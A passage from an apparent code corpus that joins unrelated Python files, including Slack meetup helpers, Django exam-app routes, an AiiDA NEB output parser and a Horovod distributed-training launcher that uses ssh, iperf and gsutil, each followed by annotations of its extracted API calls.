('rating', models.IntegerField(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')])),
('played', models.BooleanField()),
('acquisition_date', models.DateField()),
],
),
]
| [((303, 396), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (319, 396), False, 'from django.db import migrations, models\n'), ((421, 452), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (437, 452), False, 'from django.db import migrations, models\n'), ((488, 509), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (507, 509), False, 'from django.db import migrations, models\n'), ((541, 572), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(30)'}), '(max_length=30)\n', (557, 572), False, 'from django.db import migrations, models\n'), ((613, 634), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (632, 634), False, 'from django.db import migrations, models\n'), ((671, 692), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (690, 692), False, 'from django.db import migrations, models\n'), ((722, 832), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'choices': "[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (4, 'Good'), (5, 'Very good')]"}), "(choices=[(1, 'Very bad'), (2, 'Bad'), (3, 'Regular'), (\n 4, 'Good'), (5, 'Very good')])\n", (741, 832), False, 'from django.db import migrations, models\n'), ((857, 878), 'django.db.models.BooleanField', 'models.BooleanField', ([], {}), '()\n', (876, 878), False, 'from django.db import migrations, models\n'), ((918, 936), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (934, 936), False, 'from django.db import migrations, models\n')] |
BlueRidgeLabs/slack-meetups | matcher/utils.py | aca850d4265f30f6d76bed1b1baeb2973c60c83d | import re
# regex for a user or channel mention at the beginning of a message
# example matches: " <@UJQ07L30Q> ", "<#C010P8N1ABB|interns>"
# interactive playground: https://regex101.com/r/2Z7eun/2
MENTION_PATTERN = r"(?:^\s?<@(.*?)>\s?)|(?:^\s?<#(.*?)\|.*?>\s?)"
def get_set_element(_set):
"""get the element from the set to which the iterator points; returns an
arbitrary item
"""
for element in _set:
return element
def get_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the passed user ID
"""
if match.person_1.user_id == user_id:
return match.person_1
elif match.person_2.user_id == user_id:
return match.person_2
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def get_other_person_from_match(user_id, match):
"""given a Match, return the Person corresponding to the user who is NOT
the passed user ID (i.e. the other Person)
"""
if match.person_1.user_id == user_id:
return match.person_2
elif match.person_2.user_id == user_id:
return match.person_1
else:
raise Exception(f"Person with user ID \"{user_id}\" is not part of "
f"the passed match ({match}).")
def blockquote(message):
"""return `message` with markdown blockquote formatting (start each line
with "> ")
"""
if message:
return re.sub(r"^", "> ", message, flags=re.MULTILINE)
else:
return None
def get_mention(message):
"""get the user or channel ID mentioned at the beginning of a message, if
any
"""
match = re.search(MENTION_PATTERN, message)
if match:
# return the first not-None value in the match group tuple, be it a
# user or channel mention
# https://stackoverflow.com/a/18533669
return next(group for group in match.group(1, 2) if group is not None)
else:
return None
def remove_mention(message):
"""remove the user or channel mention from the beginning of a message, if
any
"""
return re.sub(MENTION_PATTERN, "", message, count=1)
| [((1683, 1718), 're.search', 're.search', (['MENTION_PATTERN', 'message'], {}), '(MENTION_PATTERN, message)\n', (1692, 1718), False, 'import re\n'), ((2135, 2180), 're.sub', 're.sub', (['MENTION_PATTERN', '""""""', 'message'], {'count': '(1)'}), "(MENTION_PATTERN, '', message, count=1)\n", (2141, 2180), False, 'import re\n'), ((1471, 1517), 're.sub', 're.sub', (['"""^"""', '"""> """', 'message'], {'flags': 're.MULTILINE'}), "('^', '> ', message, flags=re.MULTILINE)\n", (1477, 1517), False, 'import re\n')] |
pantskun/swordiemen | scripts/quest/q3526s.py | fc33ffec168e6611587fdc75de8270f6827a4176 | # In Search for the Lost Memory [Explorer Thief] (3526)
# To be replaced with GMS's exact dialogue.
# Following dialogue has been edited from DeepL on JMS's dialogue transcript (no KMS footage anywhere):
# https://kaengouraiu2.blog.fc2.com/blog-entry-46.html
recoveredMemory = 7081
darkLord = 1052001
sm.setSpeakerID(darkLord)
sm.sendNext("The way you moved without a trace...you must have exceptional talent. "
"Long time no see, #h #.")
sm.sendSay("Since when did you grow up to this point? You're no less inferior to any Dark Lord. "
"You were just a greenhorn that couldn't even hide their presence...Hmph, well, it's been a while since then. "
"Still, it feels weird to see you become so strong. I guess this is how it feels to be proud.")
sm.sendSay("But don't let your guard down. Know that there's still more progress to be made. "
"As the one who has made you into a thief, I know you that you can be even stronger...!")
sm.startQuest(parentID)
sm.completeQuest(parentID)
sm.startQuest(recoveredMemory)
sm.setQRValue(recoveredMemory, "1", False) | [] |
rummansadik/Admission-Automation | student/urls.py | a2fd305644cf60bfd0a381b855fb8c2810507f36 | from django.contrib.auth.views import LoginView
from django.urls import path
from student import views
urlpatterns = [
path('studentclick', views.studentclick_view, name='student-click'),
path('studentlogin', LoginView.as_view(
template_name='student/studentlogin.html'), name='studentlogin'),
path('studentsignup', views.student_signup_view, name='studentsignup'),
path('student-dashboard', views.student_dashboard_view,
name='student-dashboard'),
path('student-check', views.student_check_view, name='student-check'),
path('student-exam', views.student_exam_view, name='student-exam'),
path('take-exam/<int:pk>', views.take_exam_view, name='take-exam'),
path('start-exam/<int:pk>', views.start_exam_view, name='start-exam'),
path('calculate-marks', views.calculate_marks_view, name='calculate-marks'),
path('view-result', views.view_result_view, name='view-result'),
path('check-marks/<int:pk>', views.check_marks_view, name='check-marks'),
path('student-marks', views.student_marks_view, name='student-marks'),
path('expel/<int:pk>', views.student_expel_view, name='expel'),
path('video_feed', views.video_feed, name='video-feed'),
path('train_feed', views.train_feed, name='train-feed'),
path('check_feed', views.check_feed, name='check-feed'),
path('logout', views.student_logout_view, name='student-logout'),
]
| [((125, 192), 'django.urls.path', 'path', (['"""studentclick"""', 'views.studentclick_view'], {'name': '"""student-click"""'}), "('studentclick', views.studentclick_view, name='student-click')\n", (129, 192), False, 'from django.urls import path\n'), ((316, 386), 'django.urls.path', 'path', (['"""studentsignup"""', 'views.student_signup_view'], {'name': '"""studentsignup"""'}), "('studentsignup', views.student_signup_view, name='studentsignup')\n", (320, 386), False, 'from django.urls import path\n'), ((392, 478), 'django.urls.path', 'path', (['"""student-dashboard"""', 'views.student_dashboard_view'], {'name': '"""student-dashboard"""'}), "('student-dashboard', views.student_dashboard_view, name=\n 'student-dashboard')\n", (396, 478), False, 'from django.urls import path\n'), ((488, 557), 'django.urls.path', 'path', (['"""student-check"""', 'views.student_check_view'], {'name': '"""student-check"""'}), "('student-check', views.student_check_view, name='student-check')\n", (492, 557), False, 'from django.urls import path\n'), ((563, 629), 'django.urls.path', 'path', (['"""student-exam"""', 'views.student_exam_view'], {'name': '"""student-exam"""'}), "('student-exam', views.student_exam_view, name='student-exam')\n", (567, 629), False, 'from django.urls import path\n'), ((635, 701), 'django.urls.path', 'path', (['"""take-exam/<int:pk>"""', 'views.take_exam_view'], {'name': '"""take-exam"""'}), "('take-exam/<int:pk>', views.take_exam_view, name='take-exam')\n", (639, 701), False, 'from django.urls import path\n'), ((707, 776), 'django.urls.path', 'path', (['"""start-exam/<int:pk>"""', 'views.start_exam_view'], {'name': '"""start-exam"""'}), "('start-exam/<int:pk>', views.start_exam_view, name='start-exam')\n", (711, 776), False, 'from django.urls import path\n'), ((782, 857), 'django.urls.path', 'path', (['"""calculate-marks"""', 'views.calculate_marks_view'], {'name': '"""calculate-marks"""'}), "('calculate-marks', views.calculate_marks_view, name='calculate-marks')\n", (786, 857), False, 'from django.urls import path\n'), ((863, 926), 'django.urls.path', 'path', (['"""view-result"""', 'views.view_result_view'], {'name': '"""view-result"""'}), "('view-result', views.view_result_view, name='view-result')\n", (867, 926), False, 'from django.urls import path\n'), ((932, 1004), 'django.urls.path', 'path', (['"""check-marks/<int:pk>"""', 'views.check_marks_view'], {'name': '"""check-marks"""'}), "('check-marks/<int:pk>', views.check_marks_view, name='check-marks')\n", (936, 1004), False, 'from django.urls import path\n'), ((1010, 1079), 'django.urls.path', 'path', (['"""student-marks"""', 'views.student_marks_view'], {'name': '"""student-marks"""'}), "('student-marks', views.student_marks_view, name='student-marks')\n", (1014, 1079), False, 'from django.urls import path\n'), ((1085, 1147), 'django.urls.path', 'path', (['"""expel/<int:pk>"""', 'views.student_expel_view'], {'name': '"""expel"""'}), "('expel/<int:pk>', views.student_expel_view, name='expel')\n", (1089, 1147), False, 'from django.urls import path\n'), ((1153, 1208), 'django.urls.path', 'path', (['"""video_feed"""', 'views.video_feed'], {'name': '"""video-feed"""'}), "('video_feed', views.video_feed, name='video-feed')\n", (1157, 1208), False, 'from django.urls import path\n'), ((1214, 1269), 'django.urls.path', 'path', (['"""train_feed"""', 'views.train_feed'], {'name': '"""train-feed"""'}), "('train_feed', views.train_feed, name='train-feed')\n", (1218, 1269), False, 'from django.urls import path\n'), ((1275, 1330), 
'django.urls.path', 'path', (['"""check_feed"""', 'views.check_feed'], {'name': '"""check-feed"""'}), "('check_feed', views.check_feed, name='check-feed')\n", (1279, 1330), False, 'from django.urls import path\n'), ((1336, 1400), 'django.urls.path', 'path', (['"""logout"""', 'views.student_logout_view'], {'name': '"""student-logout"""'}), "('logout', views.student_logout_view, name='student-logout')\n", (1340, 1400), False, 'from django.urls import path\n'), ((219, 279), 'django.contrib.auth.views.LoginView.as_view', 'LoginView.as_view', ([], {'template_name': '"""student/studentlogin.html"""'}), "(template_name='student/studentlogin.html')\n", (236, 279), False, 'from django.contrib.auth.views import LoginView\n')] |
lin-cp/aiida-quantumespresso | aiida_quantumespresso/parsers/neb.py | 55f2bc8c137a69be24709a119bc285c700997907 | # -*- coding: utf-8 -*-
from aiida.common import NotExistent
from aiida.orm import Dict
from aiida_quantumespresso.calculations.pw import PwCalculation
from aiida_quantumespresso.parsers import QEOutputParsingError
from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure
from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb
from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout
from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries
from aiida_quantumespresso.parsers.parse_xml.exceptions import XMLParseError, XMLUnsupportedFormatError
from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml
from aiida_quantumespresso.parsers.pw import PwParser
from .base import Parser
class NebParser(Parser):
"""`Parser` implementation for the `NebCalculation` calculation job class."""
def parse(self, **kwargs):
"""Parse the retrieved files of a completed `NebCalculation` into output nodes.
Two nodes that are expected are the default 'retrieved' `FolderData` node which will store the retrieved files
permanently in the repository. The second required node is a filepath under the key `retrieved_temporary_files`
which should contain the temporary retrieved files.
"""
import os
from aiida.orm import ArrayData, TrajectoryData
import numpy
PREFIX = self.node.process_class._PREFIX
retrieved = self.retrieved
list_of_files = retrieved.list_object_names() # Note: this includes folders, but not the files they contain.
# The stdout is required for parsing
filename_stdout = self.node.get_attribute('output_filename')
if filename_stdout not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# Look for optional settings input node and potential 'parser_options' dictionary within it
# Note that we look for both NEB and PW parser options under "inputs.settings.parser_options";
# we don't even have a namespace "inputs.pw.settings".
try:
settings = self.node.inputs.settings.get_dict()
parser_options = settings[self.get_parser_settings_key()]
except (AttributeError, KeyError, NotExistent):
settings = {}
parser_options = {}
# load the pw input parameters dictionary
pw_input_dict = self.node.inputs.pw__parameters.get_dict()
# load the neb input parameters dictionary
neb_input_dict = self.node.inputs.parameters.get_dict()
# First parse the Neb output
try:
stdout = retrieved.get_object_content(filename_stdout)
neb_out_dict, iteration_data, raw_successful = parse_raw_output_neb(stdout, neb_input_dict)
# TODO: why do we ignore raw_successful ?
except (OSError, QEOutputParsingError):
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
for warn_type in ['warnings', 'parser_warnings']:
for message in neb_out_dict[warn_type]:
self.logger.warning(f'parsing NEB output: {message}')
if 'QE neb run did not reach the end of the execution.' in neb_out_dict['parser_warnings']:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_INCOMPLETE)
# Retrieve the number of images
try:
num_images = neb_input_dict['num_of_images']
except KeyError:
try:
num_images = neb_out_dict['num_of_images']
except KeyError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
if num_images < 2:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_PARSE)
# Now parse the information from the individual pw calculations for the different images
image_data = {}
positions = []
cells = []
# for each image...
for i in range(num_images):
# check if any of the known XML output file names are present, and parse the first that we find
relative_output_folder = os.path.join(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')
retrieved_files = self.retrieved.list_object_names(relative_output_folder)
for xml_filename in PwCalculation.xml_filenames:
if xml_filename in retrieved_files:
xml_file_path = os.path.join(relative_output_folder, xml_filename)
try:
with retrieved.open(xml_file_path) as xml_file:
parsed_data_xml, logs_xml = parse_pw_xml(xml_file, None)
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_READ)
except XMLParseError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_PARSE)
except XMLUnsupportedFormatError:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_FORMAT)
except Exception as exc:
import traceback
traceback.print_exc()
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
# this image is dealt with, so break the inner loop and go to the next image
break
# otherwise, if none of the filenames we tried exists, exit with an error
else:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
# look for pw output and parse it
pw_out_file = os.path.join(f'{PREFIX}_{i + 1}', 'PW.out')
try:
with retrieved.open(pw_out_file, 'r') as f:
pw_out_text = f.read() # Note: read() and not readlines()
except IOError:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
try:
parsed_data_stdout, logs_stdout = parse_pw_stdout(
pw_out_text, pw_input_dict, parser_options, parsed_data_xml
)
except Exception as exc:
return self.exit(self.exit_codes.ERROR_UNEXPECTED_PARSER_EXCEPTION.format(exception=exc))
parsed_structure = parsed_data_stdout.pop('structure', {})
parsed_trajectory = parsed_data_stdout.pop('trajectory', {})
parsed_parameters = PwParser.build_output_parameters(parsed_data_xml, parsed_data_stdout)
# Explicit information about k-points does not need to be queryable so we remove it from the parameters
parsed_parameters.pop('k_points', None)
parsed_parameters.pop('k_points_units', None)
parsed_parameters.pop('k_points_weights', None)
# Delete bands # TODO: this is just to make pytest happy; do we want to keep them instead?
parsed_parameters.pop('bands', None)
# Append the last frame of some of the smaller trajectory arrays to the parameters for easy querying
PwParser.final_trajectory_frame_to_parameters(parsed_parameters, parsed_trajectory)
# If the parser option 'all_symmetries' is False, we reduce the raw parsed symmetries to save space
all_symmetries = False if parser_options is None else parser_options.get('all_symmetries', False)
if not all_symmetries and 'cell' in parsed_structure:
reduce_symmetries(parsed_parameters, parsed_structure, self.logger)
structure_data = convert_qe_to_aiida_structure(parsed_structure)
key = f'pw_output_image_{i + 1}'
image_data[key] = parsed_parameters
positions.append([site.position for site in structure_data.sites])
cells.append(structure_data.cell)
# Add also PW warnings and errors to the neb output data, avoiding repetitions.
for log_type in ['warning', 'error']:
for message in logs_stdout[log_type]:
formatted_message = f'{log_type}: {message}'
if formatted_message not in neb_out_dict['warnings']:
neb_out_dict['warnings'].append(formatted_message)
# Symbols can be obtained simply from the last image
symbols = [str(site.kind_name) for site in structure_data.sites]
output_params = Dict(dict=dict(list(neb_out_dict.items()) + list(image_data.items())))
self.out('output_parameters', output_params)
trajectory = TrajectoryData()
trajectory.set_trajectory(
stepids=numpy.arange(1, num_images + 1),
cells=numpy.array(cells),
symbols=symbols,
positions=numpy.array(positions),
)
self.out('output_trajectory', trajectory)
if parser_options is not None and parser_options.get('all_iterations', False):
if iteration_data:
arraydata = ArrayData()
for k, v in iteration_data.items():
arraydata.set_array(k, numpy.array(v))
self.out('iteration_array', arraydata)
# Load the original and interpolated energy profile along the minimum-energy path (mep)
try:
filename = PREFIX + '.dat'
with retrieved.open(filename, 'r') as handle:
mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
mep = numpy.array([[]])
try:
filename = PREFIX + '.int'
with retrieved.open(filename, 'r') as handle:
interp_mep = numpy.loadtxt(handle)
except Exception:
self.logger.warning(f'could not open expected output file `{filename}`.')
interp_mep = numpy.array([[]])
# Create an ArrayData with the energy profiles
mep_arraydata = ArrayData()
mep_arraydata.set_array('mep', mep)
mep_arraydata.set_array('interpolated_mep', interp_mep)
self.out('output_mep', mep_arraydata)
return
@staticmethod
def get_parser_settings_key():
"""Return the key that contains the optional parser options in the `settings` input node."""
return 'parser_options'
| [((8613, 8629), 'aiida.orm.TrajectoryData', 'TrajectoryData', ([], {}), '()\n', (8627, 8629), False, 'from aiida.orm import ArrayData, TrajectoryData\n'), ((10012, 10023), 'aiida.orm.ArrayData', 'ArrayData', ([], {}), '()\n', (10021, 10023), False, 'from aiida.orm import ArrayData, TrajectoryData\n'), ((2818, 2862), 'aiida_quantumespresso.parsers.parse_raw.neb.parse_raw_output_neb', 'parse_raw_output_neb', (['stdout', 'neb_input_dict'], {}), '(stdout, neb_input_dict)\n', (2838, 2862), False, 'from aiida_quantumespresso.parsers.parse_raw.neb import parse_raw_output_neb\n'), ((4184, 4235), 'os.path.join', 'os.path.join', (['f"""{PREFIX}_{i + 1}"""', 'f"""{PREFIX}.save"""'], {}), "(f'{PREFIX}_{i + 1}', f'{PREFIX}.save')\n", (4196, 4235), False, 'import os\n'), ((5699, 5742), 'os.path.join', 'os.path.join', (['f"""{PREFIX}_{i + 1}"""', '"""PW.out"""'], {}), "(f'{PREFIX}_{i + 1}', 'PW.out')\n", (5711, 5742), False, 'import os\n'), ((6505, 6574), 'aiida_quantumespresso.parsers.pw.PwParser.build_output_parameters', 'PwParser.build_output_parameters', (['parsed_data_xml', 'parsed_data_stdout'], {}), '(parsed_data_xml, parsed_data_stdout)\n', (6537, 6574), False, 'from aiida_quantumespresso.parsers.pw import PwParser\n'), ((7141, 7228), 'aiida_quantumespresso.parsers.pw.PwParser.final_trajectory_frame_to_parameters', 'PwParser.final_trajectory_frame_to_parameters', (['parsed_parameters', 'parsed_trajectory'], {}), '(parsed_parameters,\n parsed_trajectory)\n', (7186, 7228), False, 'from aiida_quantumespresso.parsers.pw import PwParser\n'), ((7628, 7675), 'aiida_quantumespresso.parsers.parse_raw.convert_qe_to_aiida_structure', 'convert_qe_to_aiida_structure', (['parsed_structure'], {}), '(parsed_structure)\n', (7657, 7675), False, 'from aiida_quantumespresso.parsers.parse_raw import convert_qe_to_aiida_structure\n'), ((6070, 6146), 'aiida_quantumespresso.parsers.parse_raw.pw.parse_stdout', 'parse_pw_stdout', (['pw_out_text', 'pw_input_dict', 'parser_options', 'parsed_data_xml'], {}), '(pw_out_text, pw_input_dict, parser_options, parsed_data_xml)\n', (6085, 6146), True, 'from aiida_quantumespresso.parsers.parse_raw.pw import parse_stdout as parse_pw_stdout\n'), ((7530, 7597), 'aiida_quantumespresso.parsers.parse_raw.pw.reduce_symmetries', 'reduce_symmetries', (['parsed_parameters', 'parsed_structure', 'self.logger'], {}), '(parsed_parameters, parsed_structure, self.logger)\n', (7547, 7597), False, 'from aiida_quantumespresso.parsers.parse_raw.pw import reduce_symmetries\n'), ((8685, 8716), 'numpy.arange', 'numpy.arange', (['(1)', '(num_images + 1)'], {}), '(1, num_images + 1)\n', (8697, 8716), False, 'import numpy\n'), ((8736, 8754), 'numpy.array', 'numpy.array', (['cells'], {}), '(cells)\n', (8747, 8754), False, 'import numpy\n'), ((8807, 8829), 'numpy.array', 'numpy.array', (['positions'], {}), '(positions)\n', (8818, 8829), False, 'import numpy\n'), ((9038, 9049), 'aiida.orm.ArrayData', 'ArrayData', ([], {}), '()\n', (9047, 9049), False, 'from aiida.orm import ArrayData, TrajectoryData\n'), ((9445, 9466), 'numpy.loadtxt', 'numpy.loadtxt', (['handle'], {}), '(handle)\n', (9458, 9466), False, 'import numpy\n'), ((9597, 9614), 'numpy.array', 'numpy.array', (['[[]]'], {}), '([[]])\n', (9608, 9614), False, 'import numpy\n'), ((9755, 9776), 'numpy.loadtxt', 'numpy.loadtxt', (['handle'], {}), '(handle)\n', (9768, 9776), False, 'import numpy\n'), ((9914, 9931), 'numpy.array', 'numpy.array', (['[[]]'], {}), '([[]])\n', (9925, 9931), False, 'import numpy\n'), ((4472, 4522), 'os.path.join', 'os.path.join', 
(['relative_output_folder', 'xml_filename'], {}), '(relative_output_folder, xml_filename)\n', (4484, 4522), False, 'import os\n'), ((9145, 9159), 'numpy.array', 'numpy.array', (['v'], {}), '(v)\n', (9156, 9159), False, 'import numpy\n'), ((4676, 4704), 'aiida_quantumespresso.parsers.parse_xml.pw.parse.parse_xml', 'parse_pw_xml', (['xml_file', 'None'], {}), '(xml_file, None)\n', (4688, 4704), True, 'from aiida_quantumespresso.parsers.parse_xml.pw.parse import parse_xml as parse_pw_xml\n'), ((5190, 5211), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (5209, 5211), False, 'import traceback\n')] |
Mindelirium/foundation | foundation/djangocms_submenu/cms_plugins.py | 2d07e430915d696ca7376afea633692119c4d30e | from django.utils.translation import ugettext_lazy as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms.models.pluginmodel import CMSPlugin
class SubmenuPlugin(CMSPluginBase):
model = CMSPlugin
name = _("Submenu")
render_template = "cms/plugins/submenu.html"
plugin_pool.register_plugin(SubmenuPlugin)
| [((318, 360), 'cms.plugin_pool.plugin_pool.register_plugin', 'plugin_pool.register_plugin', (['SubmenuPlugin'], {}), '(SubmenuPlugin)\n', (345, 360), False, 'from cms.plugin_pool import plugin_pool\n'), ((255, 267), 'django.utils.translation.ugettext_lazy', '_', (['"""Submenu"""'], {}), "('Submenu')\n", (256, 267), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
thehardikv/ai-platform-samples | training/horovod/base/horovod_wrapper.py | 0050d12476bcbfdb99d9894a3755a97da5cd80fe | import collections
import datetime
import json
import multiprocessing
import os
import subprocess
import sys
import time
_SSHD_BINARY_PATH = "/usr/sbin/sshd"
EnvironmentConfig = collections.namedtuple(
"EnvironmentConfig",
["hosts", "port", "is_chief", "pools", "job_id"])
class DeadlineExceededError(Exception):
"""Indicates an action took too long."""
pass
def _sub_process_num_gpus(unused):
del unused
# This is imported here so that we don't load tensorflow in the parent
# process. Once the sub-process exits, it releases its allocated GPU memory.
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpus = [x.name for x in local_device_protos if x.device_type == "GPU"]
return len(gpus)
def _get_available_gpus():
"""Returns the number of GPUs on the machine."""
pool = multiprocessing.Pool(1)
result = pool.map(_sub_process_num_gpus, [None])[0]
pool.close()
pool.join()
return result
def parse_environment_config(env_config_str, job_id):
"""Parses environment config and returns a list of hosts as well as the role.
Returns:
An EnvironmentConfig.
"""
if env_config_str:
ssh_port = -1
env_config_json = json.loads(env_config_str)
cluster = env_config_json.get("cluster")
if not cluster:
return None, True
hosts = []
pools = collections.defaultdict(list)
for pool_type, tasks_per_type in cluster.items():
if pool_type == "master":
pool_type = "chief"
for host_and_port in tasks_per_type:
host, port = host_and_port.split(":")
if host == "127.0.0.1":
host = "localhost"
port = int(port)
if ssh_port == -1:
ssh_port = port
elif ssh_port != port:
raise ValueError("Inconsistent ssh ports across tasks %d != %d." %
(ssh_port, port))
hosts.append(host)
pools[pool_type].append(host)
is_chief = False
has_chief = "chief" in pools
if (env_config_json["task"]["type"] == "master" or
env_config_json["task"]["type"] == "chief"):
is_chief = True
if int(env_config_json["task"]["index"]) != 0:
raise ValueError("Only one master node is expected.")
elif ((not has_chief) and
(env_config_json["task"]["type"] == "worker") and
int(env_config_json["task"]["index"]) == 0):
is_chief = True
pools["chief"].append(pools["worker"].pop(0))
elif env_config_json["task"]["type"] != "worker":
raise ValueError("Unexpected task type for Horovod training: %s." %
env_config_json["task"]["type"])
return EnvironmentConfig(hosts=hosts, port=port, is_chief=is_chief,
pools=pools, job_id=job_id)
else:
return EnvironmentConfig(hosts=["localhost"], port=2222, is_chief=True,
pools={"chief": ["localhost"]}, job_id=job_id)
def start_ssh_server(port, is_chief):
ssh_server_command = [_SSHD_BINARY_PATH, "-p", str(port)]
if not is_chief:
ssh_server_command.append("-D")
completed = subprocess.call(ssh_server_command)
if completed != 0:
raise OSError("SSH server did not start successfully.")
def wait_for_ssh_servers(hosts, port, timeout_seconds):
deadline_datetime = datetime.datetime.utcnow() + datetime.timedelta(
seconds=timeout_seconds)
unavailable_hosts = []
while datetime.datetime.utcnow() < deadline_datetime:
unavailable_hosts = []
for host in hosts:
ssh_command = ["ssh", "-q", host, "-p", str(port), "true"]
result = subprocess.call(ssh_command)
if result != 0:
unavailable_hosts.append(host)
if not unavailable_hosts:
return
# Retry in 1 second.
time.sleep(1)
raise DeadlineExceededError(
"Timed out while waiting for all hosts to start. "
"Hosts still not available: %s. TASK_STARTUP_TIMEOUT_SECONDS=%d" %
(unavailable_hosts, timeout_seconds))
def run_horovod(env_config, jobs_per_host, args):
env = dict(os.environ)
del env["TF_CONFIG"]
num_jobs = len(env_config.hosts) * jobs_per_host
hosts = ",".join("%s:%d" % (h, jobs_per_host) for h in env_config.hosts)
horovod_command = [
"horovodrun", "--ssh-port", str(env_config.port), "-H",
hosts, "--num-proc", str(num_jobs)
]
horovod_command.extend(args)
exit_code = subprocess.call(horovod_command, env=env)
return exit_code
def benchmark_network(env_config):
if not env_config.pools["worker"]:
raise ValueError("No workers in the pool to do network benchmarking.")
iperf_server = ["iperf", "-s", "-p", "6000"]
server = subprocess.Popen(iperf_server)
# Wait 10 seconds for the local server to start.
time.sleep(10)
iperf_command = ["ssh", "-q", env_config.pools["worker"][0], "-p",
str(env_config.port),
"iperf", "-p", "6000", "-c", env_config.pools["chief"][0]]
subprocess.call(iperf_command)
server.kill()
def copy_files_recursively(src, dest):
if not dest.startswith("gs://"):
try:
os.makedirs(dest)
except OSError:
pass
copy_cmd = ["gsutil", "-m", "rsync", "-r", src, dest]
exit_code = subprocess.call(copy_cmd)
if exit_code != 0:
raise RuntimeError("Error while copying %s to %s" % (src, dest))
return exit_code
def main():
env_config_str = os.environ.get("TF_CONFIG")
job_id = os.environ.get("CLOUD_ML_JOB_ID", "localrun")
env_config = parse_environment_config(env_config_str, job_id)
print (env_config, env_config.pools, env_config.hosts, os.environ)
if os.environ.get("STAGE_GCS_PATH", False):
copy_files_recursively(
os.environ.get("STAGE_GCS_PATH"),
os.environ.get("STAGING_DIR", "/input"))
start_ssh_server(env_config.port, env_config.is_chief)
max_num_retries = os.environ.get("NUM_HOROVOD_RETRIES", 1)
if env_config.is_chief:
exit_code = 0
for retry in range(max_num_retries):
staging_timeout_seconds = int(
os.environ.get("TASK_STARTUP_TIMEOUT_SECONDS", 600))
wait_for_ssh_servers(env_config.hosts, env_config.port,
staging_timeout_seconds)
if os.environ.get("BENCHMARK_NETWORK", False):
benchmark_network(env_config)
num_gpus = _get_available_gpus()
# If there are no GPUs, we can just run single process per machine.
jobs_per_host = max(1, num_gpus)
args = sys.argv[1:]
exit_code = run_horovod(env_config=env_config, jobs_per_host=jobs_per_host,
args=args)
if exit_code == 0:
break
else:
print ("Retrying...", retry, "out of", max_num_retries)
if os.environ.get("GCS_OUTPUT_PATH", False):
copy_files_recursively(
os.environ.get("OUTPUT_DIR", "/output"),
os.path.join(os.environ.get("GCS_OUTPUT_PATH"), job_id))
sys.exit(exit_code)
if __name__ == "__main__":
main()
| [((180, 277), 'collections.namedtuple', 'collections.namedtuple', (['"""EnvironmentConfig"""', "['hosts', 'port', 'is_chief', 'pools', 'job_id']"], {}), "('EnvironmentConfig', ['hosts', 'port', 'is_chief',\n 'pools', 'job_id'])\n", (202, 277), False, 'import collections\n'), ((651, 682), 'tensorflow.python.client.device_lib.list_local_devices', 'device_lib.list_local_devices', ([], {}), '()\n', (680, 682), False, 'from tensorflow.python.client import device_lib\n'), ((864, 887), 'multiprocessing.Pool', 'multiprocessing.Pool', (['(1)'], {}), '(1)\n', (884, 887), False, 'import multiprocessing\n'), ((3121, 3156), 'subprocess.call', 'subprocess.call', (['ssh_server_command'], {}), '(ssh_server_command)\n', (3136, 3156), False, 'import subprocess\n'), ((4392, 4433), 'subprocess.call', 'subprocess.call', (['horovod_command'], {'env': 'env'}), '(horovod_command, env=env)\n', (4407, 4433), False, 'import subprocess\n'), ((4660, 4690), 'subprocess.Popen', 'subprocess.Popen', (['iperf_server'], {}), '(iperf_server)\n', (4676, 4690), False, 'import subprocess\n'), ((4744, 4758), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (4754, 4758), False, 'import time\n'), ((4949, 4979), 'subprocess.call', 'subprocess.call', (['iperf_command'], {}), '(iperf_command)\n', (4964, 4979), False, 'import subprocess\n'), ((5206, 5231), 'subprocess.call', 'subprocess.call', (['copy_cmd'], {}), '(copy_cmd)\n', (5221, 5231), False, 'import subprocess\n'), ((5374, 5401), 'os.environ.get', 'os.environ.get', (['"""TF_CONFIG"""'], {}), "('TF_CONFIG')\n", (5388, 5401), False, 'import os\n'), ((5413, 5458), 'os.environ.get', 'os.environ.get', (['"""CLOUD_ML_JOB_ID"""', '"""localrun"""'], {}), "('CLOUD_ML_JOB_ID', 'localrun')\n", (5427, 5458), False, 'import 